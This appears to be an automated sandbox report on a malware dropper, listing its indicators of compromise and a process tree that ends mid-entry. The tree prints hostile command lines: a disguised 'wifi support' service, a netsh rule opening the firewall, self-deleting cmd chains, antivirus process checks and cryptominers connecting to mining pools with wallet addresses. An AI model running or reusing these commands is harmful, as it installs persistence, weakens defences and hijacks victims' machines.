7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	sotema_3.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

pid process

2964

pid	process
2964

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

timeout.exejfiag3g_gg.exesotema_2.exeyl63TlwMGTanX9wwTFJ81hcg.exeWerFault.exe

pid	process
4332	timeout.exe
4332	timeout.exe
3888	jfiag3g_gg.exe
3888	jfiag3g_gg.exe
3608	sotema_2.exe
3608	sotema_2.exe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
4288	WerFault.exe
4288	WerFault.exe
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2964
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

sotema_2.exeLxjwaytgkwrfchptbandzip.exe

pid process

3608 sotema_2.exe
2776 Lxjwaytgkwrfchptbandzip.exe

pid	process
2964

pid	process
3608	sotema_2.exe
2776	Lxjwaytgkwrfchptbandzip.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

jfiag3g_gg.exesotema_8.exerL8zVE7YwtDWpvGfFMtZ9erB.exetimeout.exesotema_8.exe1pTBWPkfr7lqlST6OW1pQfdc.exesotema_7.exeAppLaunch.exetaskkill.exeMSBuild.exe

description	pid	process
Token: SeDebugPrivilege	3888	jfiag3g_gg.exe
Token: SeDebugPrivilege	116	sotema_8.exe
Token: SeDebugPrivilege	4296	rL8zVE7YwtDWpvGfFMtZ9erB.exe
Token: SeDebugPrivilege	4332	timeout.exe
Token: SeDebugPrivilege	2736	sotema_8.exe
Token: SeDebugPrivilege	4772	1pTBWPkfr7lqlST6OW1pQfdc.exe
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeDebugPrivilege	800	sotema_7.exe
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeDebugPrivilege	4436	AppLaunch.exe
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeDebugPrivilege	3860	taskkill.exe
Token: SeDebugPrivilege	824	MSBuild.exe
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

rundll32.exeAccostarmi.exe.pif

pid process

5000 rundll32.exe
4708 Accostarmi.exe.pif
2964
2964
4708 Accostarmi.exe.pif
4708 Accostarmi.exe.pif
2964
2964
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Accostarmi.exe.pif

pid process

4708 Accostarmi.exe.pif
4708 Accostarmi.exe.pif
4708 Accostarmi.exe.pif
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

pid process

2964
2964

pid	process
5000	rundll32.exe
4708	Accostarmi.exe.pif
2964
2964
4708	Accostarmi.exe.pif
4708	Accostarmi.exe.pif
2964
2964

pid	process
4708	Accostarmi.exe.pif
4708	Accostarmi.exe.pif
4708	Accostarmi.exe.pif

pid	process
2964
2964

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ef4c3b30be6653acf3ef81ecf835b5eaea7307d528197716d2c54db7a02ec416.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exesotema_9.exesotema_4.exesotema_8.exe

description	pid	process	target process
PID 3484 wrote to memory of 2212	3484	ef4c3b30be6653acf3ef81ecf835b5eaea7307d528197716d2c54db7a02ec416.exe	setup_install.exe
PID 3484 wrote to memory of 2212	3484	ef4c3b30be6653acf3ef81ecf835b5eaea7307d528197716d2c54db7a02ec416.exe	setup_install.exe
PID 3484 wrote to memory of 2212	3484	ef4c3b30be6653acf3ef81ecf835b5eaea7307d528197716d2c54db7a02ec416.exe	setup_install.exe
PID 2212 wrote to memory of 2980	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 2980	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 2980	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 1100	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 1100	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 1100	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 2452	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 2452	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 2452	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 2036	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 2036	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 2036	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 2656	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 2656	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 2656	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 688	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 688	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 688	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 3832	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 3832	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 3832	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 824	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 824	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 824	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 3880	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 3880	2212	setup_install.exe	cmd.exe
PID 2212 wrote to memory of 3880	2212	setup_install.exe	cmd.exe
PID 1100 wrote to memory of 3608	1100	cmd.exe	sotema_2.exe
PID 1100 wrote to memory of 3608	1100	cmd.exe	sotema_2.exe
PID 1100 wrote to memory of 3608	1100	cmd.exe	sotema_2.exe
PID 3832 wrote to memory of 800	3832	cmd.exe	sotema_7.exe
PID 3832 wrote to memory of 800	3832	cmd.exe	sotema_7.exe
PID 3832 wrote to memory of 800	3832	cmd.exe	sotema_7.exe
PID 2656 wrote to memory of 3888	2656	cmd.exe	sotema_5.exe
PID 2656 wrote to memory of 3888	2656	cmd.exe	sotema_5.exe
PID 2452 wrote to memory of 2120	2452	cmd.exe	sotema_3.exe
PID 2452 wrote to memory of 2120	2452	cmd.exe	sotema_3.exe
PID 2452 wrote to memory of 2120	2452	cmd.exe	sotema_3.exe
PID 824 wrote to memory of 116	824	cmd.exe	sotema_8.exe
PID 824 wrote to memory of 116	824	cmd.exe	sotema_8.exe
PID 824 wrote to memory of 116	824	cmd.exe	sotema_8.exe
PID 2980 wrote to memory of 908	2980	cmd.exe	sotema_1.exe
PID 2980 wrote to memory of 908	2980	cmd.exe	sotema_1.exe
PID 2980 wrote to memory of 908	2980	cmd.exe	sotema_1.exe
PID 3880 wrote to memory of 2440	3880	cmd.exe	sotema_9.exe
PID 3880 wrote to memory of 2440	3880	cmd.exe	sotema_9.exe
PID 3880 wrote to memory of 2440	3880	cmd.exe	sotema_9.exe
PID 688 wrote to memory of 2064	688	cmd.exe	sotema_6.exe
PID 688 wrote to memory of 2064	688	cmd.exe	sotema_6.exe
PID 688 wrote to memory of 2064	688	cmd.exe	sotema_6.exe
PID 2036 wrote to memory of 2260	2036	cmd.exe	sotema_4.exe
PID 2036 wrote to memory of 2260	2036	cmd.exe	sotema_4.exe
PID 2036 wrote to memory of 2260	2036	cmd.exe	sotema_4.exe
PID 2440 wrote to memory of 2112	2440	sotema_9.exe	sotema_9.tmp
PID 2440 wrote to memory of 2112	2440	sotema_9.exe	sotema_9.tmp
PID 2440 wrote to memory of 2112	2440	sotema_9.exe	sotema_9.tmp
PID 2260 wrote to memory of 3044	2260	sotema_4.exe	WerFault.exe
PID 2260 wrote to memory of 3044	2260	sotema_4.exe	WerFault.exe
PID 2260 wrote to memory of 3044	2260	sotema_4.exe	WerFault.exe
PID 116 wrote to memory of 2736	116	sotema_8.exe	sotema_8.exe
PID 116 wrote to memory of 2736	116	sotema_8.exe	sotema_8.exe

C:\Users\Admin\AppData\Local\Temp\ef4c3b30be6653acf3ef81ecf835b5eaea7307d528197716d2c54db7a02ec416.exe
"C:\Users\Admin\AppData\Local\Temp\ef4c3b30be6653acf3ef81ecf835b5eaea7307d528197716d2c54db7a02ec416.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3484

C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_1.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2980

C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_1.exe
sotema_1.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:908

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
5⤵
- Loads dropped DLL
PID:1260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 600
6⤵
- Program crash
PID:4000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_3.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2452

C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_3.exe
sotema_3.exe
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 1888
5⤵
- Program crash
PID:5008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_2.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1100

C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_2.exe
sotema_2.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_4.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2036

C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_4.exe
sotema_4.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2260

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:3044

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_8.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:824

C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_8.exe
sotema_8.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:116

C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_8.exe
C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_8.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_9.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3880

C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_9.exe
sotema_9.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2440

C:\Users\Admin\AppData\Local\Temp\is-03U56.tmp\sotema_9.tmp
"C:\Users\Admin\AppData\Local\Temp\is-03U56.tmp\sotema_9.tmp" /SL5="$C003E,161510,77824,C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_9.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_7.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3832

C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_7.exe
sotema_7.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_6.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:688

C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_6.exe
sotema_6.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:2064

C:\Users\Admin\Documents\_C0eL_BNmMz7XuKXafyT9KYt.exe
"C:\Users\Admin\Documents\_C0eL_BNmMz7XuKXafyT9KYt.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1720

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
- Loads dropped DLL
- Checks processor information in registry
PID:4380

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" & exit
7⤵
PID:3468

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Delays execution with timeout.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4332

C:\Users\Admin\Documents\Xd7n95TtqtWnH3UnglLX08Tk.exe
"C:\Users\Admin\Documents\Xd7n95TtqtWnH3UnglLX08Tk.exe"
5⤵
PID:1880

C:\Users\Admin\Documents\DVYaVquZ_dckTASpjgo95IcX.exe
"C:\Users\Admin\Documents\DVYaVquZ_dckTASpjgo95IcX.exe"
5⤵
PID:3164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im DVYaVquZ_dckTASpjgo95IcX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\DVYaVquZ_dckTASpjgo95IcX.exe" & del C:\ProgramData\*.dll & exit
6⤵
PID:3704

C:\Windows\SysWOW64\taskkill.exe
taskkill /im DVYaVquZ_dckTASpjgo95IcX.exe /f
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3860

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:5032

C:\Users\Admin\Documents\FyT3wXlJWIS338nwzW0Apccb.exe
"C:\Users\Admin\Documents\FyT3wXlJWIS338nwzW0Apccb.exe"
5⤵
- Executes dropped EXE
PID:4112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 904
6⤵
- Program crash
PID:4676

C:\Users\Admin\Documents\XtwIrs9VnN0GLedi7ioKgsZz.exe
"C:\Users\Admin\Documents\XtwIrs9VnN0GLedi7ioKgsZz.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 624
6⤵
- Program crash
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 644
6⤵
- Executes dropped EXE
- Program crash
PID:3044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 652
6⤵
- Program crash
PID:4176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 644
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Program crash
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 1252
6⤵
- Program crash
PID:1860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 1260
6⤵
- Program crash
PID:2128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 1304
6⤵
- Program crash
PID:4540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 1264
6⤵
- Program crash
PID:3520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "XtwIrs9VnN0GLedi7ioKgsZz.exe" /f & erase "C:\Users\Admin\Documents\XtwIrs9VnN0GLedi7ioKgsZz.exe" & exit
6⤵
PID:1092

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "XtwIrs9VnN0GLedi7ioKgsZz.exe" /f
7⤵
- Kills process with taskkill
PID:1700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 1264
6⤵
- Program crash
PID:4132

C:\Users\Admin\Documents\w2lXjkfBc5SFinec6cMspery.exe
"C:\Users\Admin\Documents\w2lXjkfBc5SFinec6cMspery.exe"
5⤵
- Executes dropped EXE
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 432
6⤵
- Program crash
PID:5060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 452
6⤵
- Program crash
PID:4400

C:\Users\Admin\Documents\ZhFXaFM8J3MTLIvnluF00SfO.exe
"C:\Users\Admin\Documents\ZhFXaFM8J3MTLIvnluF00SfO.exe"
5⤵
- Executes dropped EXE
PID:4076

C:\Users\Admin\Documents\dH4pVYzAWP2X8NCSEdV6ffFH.exe
"C:\Users\Admin\Documents\dH4pVYzAWP2X8NCSEdV6ffFH.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4340

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bpqixmat\
6⤵
PID:4708

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yqwxfxyn.exe" C:\Windows\SysWOW64\bpqixmat\
6⤵
PID:4984

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create bpqixmat binPath= "C:\Windows\SysWOW64\bpqixmat\yqwxfxyn.exe /d\"C:\Users\Admin\Documents\dH4pVYzAWP2X8NCSEdV6ffFH.exe\"" type= own start= auto DisplayName= "wifi support"
6⤵
PID:5072

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description bpqixmat "wifi internet conection"
6⤵
PID:4532

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start bpqixmat
6⤵
PID:3508

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
6⤵
PID:3368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 1044
6⤵
- Program crash
PID:996

C:\Users\Admin\Documents\YgvzLu0GeFWrxI_6gIZ1tLr2.exe
"C:\Users\Admin\Documents\YgvzLu0GeFWrxI_6gIZ1tLr2.exe"
5⤵
PID:4332

C:\Users\Admin\Documents\2DyBHcskDYVxWwxgUL3mNLyo.exe
"C:\Users\Admin\Documents\2DyBHcskDYVxWwxgUL3mNLyo.exe"
5⤵
PID:4320

C:\Users\Admin\Documents\Te2BnXqb0WkJR803Y7RqUUxh.exe
"C:\Users\Admin\Documents\Te2BnXqb0WkJR803Y7RqUUxh.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:4312

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4436

C:\Users\Admin\AppData\Local\Temp\Debo.exe
"C:\Users\Admin\AppData\Local\Temp\Debo.exe"
7⤵
- Executes dropped EXE
PID:2784

C:\Users\Admin\AppData\Local\Temp\Msisa.exe
"C:\Users\Admin\AppData\Local\Temp\Msisa.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5072

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe --algo ETHASH --pool eth.2miners.com:2020 --user 0x5fD8bC7909327ae2c2784D5B90A74772623bE5ed --worker rth2
8⤵
PID:2256

C:\Windows\notepad.exe
C:\Windows\notepad.exe --coin=XMR -o etc.2miners.com:1010 -u 43RdvzWiARDHZFCv7wPMsGTZnXLAfEBQfAGZpjGZnKwYfuuj5HJLGTaSPBBXC4h2bgHxV8dzbhYGCU73y5DZNrGNDq8iykq -p rth2
8⤵
PID:3752

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3752 -s 416
9⤵
- Program crash
PID:4408

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "eth"
8⤵
PID:3980

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3980 -s 236
9⤵
- Program crash
PID:4216

C:\Users\Admin\Documents\eBwDlCxU_W627VmAkEIkVTnY.exe
"C:\Users\Admin\Documents\eBwDlCxU_W627VmAkEIkVTnY.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
6⤵
PID:4848

C:\Windows\SysWOW64\cmd.exe
cmd
7⤵
PID:2156

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
8⤵
- Enumerates processes with tasklist
PID:4500

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
8⤵
PID:4828

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
8⤵
- Enumerates processes with tasklist
PID:3324

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
8⤵
PID:4876

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
8⤵
PID:3600

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
8⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4708

C:\Users\Admin\Documents\rL8zVE7YwtDWpvGfFMtZ9erB.exe
"C:\Users\Admin\Documents\rL8zVE7YwtDWpvGfFMtZ9erB.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:4296

C:\Users\Admin\AppData\Local\Temp\18572cc0-8686-4186-ba71-eaa50e3961fc.exe
"C:\Users\Admin\AppData\Local\Temp\18572cc0-8686-4186-ba71-eaa50e3961fc.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
PID:4320

C:\Users\Admin\Documents\2DyBHcskDYVxWwxgUL3mNLyo.exe
C:\Users\Admin\Documents\2DyBHcskDYVxWwxgUL3mNLyo.exe
7⤵
PID:824

C:\Users\Admin\Documents\Gu2aVgKKvMvm6oyvWspfvu93.exe
"C:\Users\Admin\Documents\Gu2aVgKKvMvm6oyvWspfvu93.exe"
5⤵
PID:4288

C:\Users\Admin\Documents\yl63TlwMGTanX9wwTFJ81hcg.exe
"C:\Users\Admin\Documents\yl63TlwMGTanX9wwTFJ81hcg.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4280

C:\Users\Admin\Documents\mgXg7Ro8FKKV4bTcpmQEEaTw.exe
"C:\Users\Admin\Documents\mgXg7Ro8FKKV4bTcpmQEEaTw.exe"
5⤵
- Executes dropped EXE
PID:4272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4272 -s 444
6⤵
- Program crash
PID:2940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4272 -s 484
6⤵
- Program crash
PID:3788

C:\Users\Admin\Documents\fkKP3i9Y5AaeQBnP0Ggv_a61.exe
"C:\Users\Admin\Documents\fkKP3i9Y5AaeQBnP0Ggv_a61.exe"
5⤵
- Executes dropped EXE
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 428
6⤵
- Program crash
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 440
6⤵
- Program crash
PID:2124

C:\Users\Admin\Documents\nhfKuCPLSN_ae63cP6PryRGY.exe
"C:\Users\Admin\Documents\nhfKuCPLSN_ae63cP6PryRGY.exe"
5⤵
- Executes dropped EXE
PID:4368

C:\Users\Admin\AppData\Local\Temp\7zS6BF.tmp\Install.exe
.\Install.exe
6⤵
- Executes dropped EXE
PID:4268

C:\Users\Admin\AppData\Local\Temp\7zS2090.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:3800

C:\Windows\SysWOW64\forfiles.exe
